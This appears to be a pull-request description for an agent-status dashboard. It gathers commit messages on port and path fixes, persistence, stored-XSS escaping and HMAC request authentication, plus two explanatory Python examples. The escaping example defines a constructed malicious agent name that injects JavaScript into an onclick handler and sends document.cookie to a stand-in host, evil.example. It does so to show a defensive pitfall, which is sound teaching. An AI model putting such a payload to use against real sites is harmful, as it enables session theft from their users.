fix: resolve hardcoded paths, port mismatch, XSS, and UX issues
Thanks — I reviewed PR #9 and the fixes look good to me (path portability, port consistency, and related stability issues).
I’m approving and merging this as our stability baseline.
After merge, we’ll run a quick smoke test in production.
Previously every poll (3.5s per client) unconditionally wrote both
agents-state.json and join-keys.json. Now tracks a dirty flag and
only persists when cleanup actually modifies state (expired agents
removed or agents marked offline).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Backend: add html.escape() to clean_text() so user-controlled input
(agent names, details) is entity-escaped before storage.
Frontend: memo content now uses textContent instead of innerHTML
(newlines handled by CSS white-space:pre-wrap). Guest agent names
are escaped before interpolation into template literals to prevent
stored XSS via malicious agent names in onclick handlers.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
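The escaping strategy in the commit above, as an added example (not the project's own code). `clean_text()` strips control characters, truncates, then entity-escapes with `html.escape(quote=True)`; the `render_*` markup, `MAX_NAME_LEN` and the malicious name are assumptions constructed for the illustration. It also demonstrates two caveats a reviewer would raise: a value that is entity-encoded at rest must be `html.unescape`d before it reaches a plain-text sink such as `textContent`, otherwise the user sees a literal `&lt;`; and entity escaping alone does not make an inline `onclick="..."` safe, because the HTML parser decodes character references in the attribute value before the script engine parses it, so the quote comes back. A `data-*` attribute read via `dataset` keeps the name as data.

```python
import html
import re

# Added example, not the project's code. MAX_NAME_LEN, the markup in the
# render_* helpers and MALICIOUS_NAME are assumptions for this illustration.
MAX_NAME_LEN = 64
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f-\x9f]")

# Constructed attacker-controlled agent name (not from the page).
MALICIOUS_NAME = "Bob');fetch('//evil.example/?c='+document.cookie)//"


def clean_text(value, max_len=MAX_NAME_LEN):
    """Normalise user-controlled text and entity-escape it before storage."""
    if value is None:
        return ""
    text = _CONTROL_CHARS.sub("", str(value)).strip()
    # Truncate BEFORE escaping so an entity such as &#x27; is never cut in half.
    text = text[:max_len]
    # quote=True also encodes ' and " (as &#x27; and &quot;), not only < > &.
    return html.escape(text, quote=True)


def render_agent_text(stored_name):
    """Safe sink: the stored value becomes element text, entities render as characters."""
    return f'<span class="agent">{stored_name}</span>'


def render_agent_data_attr(stored_name):
    """Safe sink for click handling: the name sits in a data-* attribute and the
    frontend reads el.dataset.agent, so it is only ever a string value in JS."""
    return f'<button data-agent="{stored_name}">{stored_name}</button>'


def render_agent_inline_onclick(stored_name):
    """Unsafe sink, kept to show the failure mode: the name is spliced into a
    JS string literal inside an event-handler attribute."""
    return f'<button onclick="selectAgent(\'{stored_name}\')">{stored_name}</button>'


def js_engine_sees(markup):
    """Simulate the browser: an event-handler attribute value is entity-decoded
    by the HTML parser before it is handed to the script engine."""
    m = re.search(r'onclick="([^"]*)"', markup)
    return html.unescape(m.group(1)) if m else ""


def plain_text_for_display(stored_name):
    """What a plain-text sink (textContent, logs, non-HTML API clients) must do
    with a value that was entity-encoded at storage time."""
    return html.unescape(stored_name)


if __name__ == "__main__":
    stored = clean_text(MALICIOUS_NAME)
    print("stored:       ", stored)
    print("text node:    ", render_agent_text(stored))
    print("data attr:    ", render_agent_data_attr(stored))
    print("inline onclick, as the JS engine sees it:")
    print("  ", js_engine_sees(render_agent_inline_onclick(stored)))
```

The last line of the demo prints `selectAgent('Bob');fetch(...)//')`: the `&#x27;` has been decoded back to `'` and the handler is injectable even though the stored value contained no quote. Keep user data out of inline handlers entirely and attach listeners from script.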
Each /yesterday-memo request used random.choice for the wisdom quote,
causing the card to flicker on frontend polling. Now uses date-based
index (YYYYMMDD % len) so the same quote shows consistently all day.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Previously /set_state only wrote to state.json, but /agents reads
from agents-state.json. The main agent's status in agents-state.json
was stale. Now save_state() also updates the isMain=true entry in
agents-state.json to keep both files consistent.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
The backend runs on port 19000 (to avoid conflict with OpenClaw on
18791), but docs and scripts referenced 18791. Unified all references
to 19000 and made the port configurable via OFFICE_PORT env var.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
All scripts now use os.path.dirname(os.path.abspath(__file__)) to
dynamically resolve paths relative to their location, consistent
with backend/app.py. Also fixes healthcheck.sh to use --fail and
--max-time for curl, and corrects port references to 19000.
Affected files:
- set_state.py
- healthcheck.sh
- office-agent-push.py
- convert_to_webp.py
- repack_star_working.py
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Add clean_text(), HMAC token auth for set_state, same-origin check,
structured logging with trace IDs, and agent state normalization.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
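One way to implement the HMAC token check and same-origin check for `/set_state` described in the commit above, as an added example that is not the project's own code. The header names (`X-Office-Token`, `X-Office-Timestamp`), the 60 second skew window, the allowed-origin list and the fallback to the `Referer` origin are assumptions; the 19000 default and the `OFFICE_PORT` variable come from the page. The token is an HMAC-SHA256 over `"<timestamp>.<body>"`, so a captured token cannot be replayed with a different body or outside the skew window, and the comparison uses `hmac.compare_digest` so the check is constant-time.

```python
import hashlib
import hmac
import os
import time
from typing import Optional, Tuple
from urllib.parse import urlparse

# Added example, not the project's code. Header names, MAX_SKEW_SECONDS and
# the allowed-origin set are assumptions for this illustration.
OFFICE_PORT = os.environ.get("OFFICE_PORT", "19000")
ALLOWED_ORIGINS = {
    f"http://localhost:{OFFICE_PORT}",
    f"http://127.0.0.1:{OFFICE_PORT}",
}
MAX_SKEW_SECONDS = 60


def make_token(secret: bytes, timestamp: int, body: bytes) -> str:
    """HMAC-SHA256 over "<timestamp>.<body>", hex-encoded.

    Binding the body stops reuse of a captured token with a different state;
    binding the timestamp bounds replay to the MAX_SKEW_SECONDS window.
    """
    msg = str(timestamp).encode() + b"." + body
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def request_origin(headers: dict) -> Optional[str]:
    """Origin header, falling back to the scheme://host[:port] part of Referer.
    Returns None for clients that send neither (e.g. set_state.py run locally)."""
    origin = headers.get("Origin")
    if origin:
        return origin
    referer = headers.get("Referer")
    if referer:
        u = urlparse(referer)
        if u.scheme and u.netloc:
            return f"{u.scheme}://{u.netloc}"
    return None


def verify_set_state(secret: bytes, headers: dict, body: bytes,
                     now: Optional[int] = None) -> Tuple[bool, str]:
    """Return (ok, reason). Run this before json.loads(body) so an
    unauthenticated caller never reaches the parser or the state files."""
    now = int(time.time()) if now is None else now

    # Same-origin check: a browser-originated request from any other origin is
    # rejected outright; requests with no Origin/Referer still need the token.
    origin = request_origin(headers)
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "bad origin"

    token = headers.get("X-Office-Token")
    if not token:
        return False, "missing token"
    try:
        ts = int(headers.get("X-Office-Timestamp", ""))
    except ValueError:
        return False, "bad timestamp"
    if abs(now - ts) > MAX_SKEW_SECONDS:
        return False, "stale timestamp"

    expected = make_token(secret, ts, body)
    if not hmac.compare_digest(expected, token):
        return False, "bad token"
    return True, "ok"


if __name__ == "__main__":
    # Constructed demo values; a real deployment loads the secret from config.
    secret = b"constructed-demo-secret"
    body = b'{"state": "working"}'
    ts = int(time.time())
    headers = {
        "Origin": f"http://localhost:{OFFICE_PORT}",
        "X-Office-Timestamp": str(ts),
        "X-Office-Token": make_token(secret, ts, body),
    }
    print(verify_set_state(secret, headers, body))
    print(verify_set_state(secret, headers, b'{"state": "idle"}'))
```

A client such as set_state.py computes the same `make_token()` over the exact bytes it sends; any re-serialisation of the JSON between signing and sending changes the bytes and fails the check, which is the intended behaviour.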
- Add receiving and replying states for real-time OpenClaw message tracking
- Make ROOT_DIR and STATE_FILE configurable via env vars (STAR_OFFICE_ROOT, STAR_OFFICE_STATE_FILE)
- Replace hardcoded /root/ paths with relative defaults
- Add bubble texts for new states
- Include new states in auto-idle working set
Made-with: Cursor